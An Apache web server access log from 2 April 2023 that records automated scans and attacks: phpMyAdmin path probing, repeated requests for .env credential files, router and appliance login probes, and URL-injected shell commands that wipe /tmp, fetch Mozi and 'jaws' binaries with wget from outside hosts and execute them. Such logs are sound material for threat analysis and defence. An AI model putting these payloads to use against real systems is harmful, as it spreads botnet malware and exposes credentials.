206.189.136.214 - - [02/Apr/2023:11:34:56 +0000] "GET /myadmin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:56 +0000] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:56 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:57 +0000] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:57 +0000] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:57 +0000] "GET /mysql/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:58 +0000] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:58 +0000] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:58 +0000] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:59 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:34:59 +0000] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:00 +0000] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:00 +0000] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:00 +0000] "GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:01 +0000] "GET /mysql/web/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:01 +0000] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:02 +0000] "GET /PMA/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:02 +0000] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:02 +0000] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:03 +0000] "GET /database/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:03 +0000] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:03 +0000] "GET /index.php?lang=en HTTP/1.1" 200 8404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:04 +0000] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:04 +0000] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
206.189.136.214 - - [02/Apr/2023:11:35:05 +0000] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
143.0.166.107 - - [02/Apr/2023:12:20:19 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
143.0.166.107 - - [02/Apr/2023:12:20:20 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
135.125.217.54 - - [02/Apr/2023:12:20:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:12:20:40 +0000] "POST / HTTP/1.1" 405 409765 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
5.100.251.34 - - [02/Apr/2023:12:30:47 +0000] "GET / HTTP/1.1" 200 41226 "-" "Java/1.8.0_212"
5.100.251.34 - - [02/Apr/2023:12:30:48 +0000] "GET /api.json HTTP/1.1" 200 - "-" "Java/1.8.0_212"
45.128.232.149 - - [02/Apr/2023:12:35:42 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423640 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.154.128.189 - - [02/Apr/2023:12:40:07 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
117.217.234.132 - - [02/Apr/2023:12:42:35 +0000] "POST /HNAP1/ HTTP/1.0" 301 235 "-" "-"
51.159.164.227 - - [02/Apr/2023:13:05:29 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [02/Apr/2023:13:05:30 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.159.164.227 - - [02/Apr/2023:13:05:30 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
135.125.217.54 - - [02/Apr/2023:13:26:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:13:26:14 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.80.59.162 - - [02/Apr/2023:13:37:24 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.80.59.162 - - [02/Apr/2023:13:37:24 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [02/Apr/2023:14:00:04 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
117.194.149.61 - - [02/Apr/2023:14:15:27 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.194.149.61:37358/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 200 - "-" "Hello, world"
42.226.66.40 - - [02/Apr/2023:14:30:20 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.226.66.40:58243/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 - "-" "-"
185.254.196.173 - - [02/Apr/2023:14:33:20 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:14:33:21 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:14:53:06 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:14:53:07 +0000] "POST / HTTP/1.1" 405 409725 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.195.93.98 - - [02/Apr/2023:14:53:23 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
192.155.90.118 - - [02/Apr/2023:15:10:50 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [02/Apr/2023:15:20:48 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:16:09:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:16:09:37 +0000] "POST / HTTP/1.1" 405 409755 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
137.184.217.189 - - [02/Apr/2023:16:36:45 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
43.154.128.189 - - [02/Apr/2023:16:40:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.181.94 - - [02/Apr/2023:16:50:44 +0000] "\x16\x03\x01" 400 226 "-" "-"
::1 - - [02/Apr/2023:17:00:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [02/Apr/2023:17:00:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [02/Apr/2023:17:00:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
185.254.196.173 - - [02/Apr/2023:17:03:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:17:03:06 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [02/Apr/2023:17:06:31 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [02/Apr/2023:17:59:32 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.235.24.148 - - [02/Apr/2023:18:33:37 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
20.164.225.135 - - [02/Apr/2023:18:38:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:41 +0000] "GET /conf/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /wp-content/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /wp-admin/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /library/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /new/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /vendor/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /old/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:42 +0000] "GET /local/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:43 +0000] "GET /api/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:43 +0000] "GET /blog/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:43 +0000] "GET /crm/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:43 +0000] "GET /admin/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:43 +0000] "GET /laravel/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /app/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /app/config/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /apps/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /audio/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /cgi-bin/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /backend/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /src/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:44 +0000] "GET /base/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:45 +0000] "GET /core/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:45 +0000] "GET /vendor/laravel/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
20.164.225.135 - - [02/Apr/2023:18:38:45 +0000] "GET /storage/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
149.106.135.116 - - [02/Apr/2023:18:50:59 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
135.125.217.54 - - [02/Apr/2023:18:59:01 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:18:59:02 +0000] "POST / HTTP/1.1" 405 409721 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [02/Apr/2023:19:18:10 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [02/Apr/2023:20:08:51 +0000] "GET / HTTP/1.1" 200 8379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [02/Apr/2023:20:19:39 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:20:19:39 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [02/Apr/2023:20:36:42 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.172.21 - - [02/Apr/2023:20:53:05 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.217.54 - - [02/Apr/2023:21:05:58 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:21:05:59 +0000] "POST / HTTP/1.1" 405 409721 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.142.107.249 - - [02/Apr/2023:21:09:51 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423638 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.32.162.159 - - [02/Apr/2023:21:20:06 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.217.54 - - [02/Apr/2023:21:33:28 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:21:33:29 +0000] "POST / HTTP/1.1" 405 409717 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:21:46:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:21:46:14 +0000] "POST / HTTP/1.1" 405 409740 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.167.236.91 - admin [02/Apr/2023:22:11:40 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 405 422504 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
103.167.236.91 - - [02/Apr/2023:22:11:41 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.58.0"
::1 - - [02/Apr/2023:22:46:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [02/Apr/2023:22:46:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [02/Apr/2023:22:46:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
87.236.176.243 - - [02/Apr/2023:22:52:01 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.128 - - [02/Apr/2023:22:52:02 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
87.236.176.239 - - [02/Apr/2023:22:52:02 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
193.32.162.159 - - [02/Apr/2023:23:00:19 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.79.181.104 - - [02/Apr/2023:23:00:24 +0000] "\x16\x03\x01" 400 226 "-" "-"
198.235.24.161 - - [02/Apr/2023:23:12:50 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
43.154.128.189 - - [02/Apr/2023:23:15:50 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:23:24:22 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [02/Apr/2023:23:24:22 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:23:37:03 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [02/Apr/2023:23:37:03 +0000] "POST / HTTP/1.1" 405 409746 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
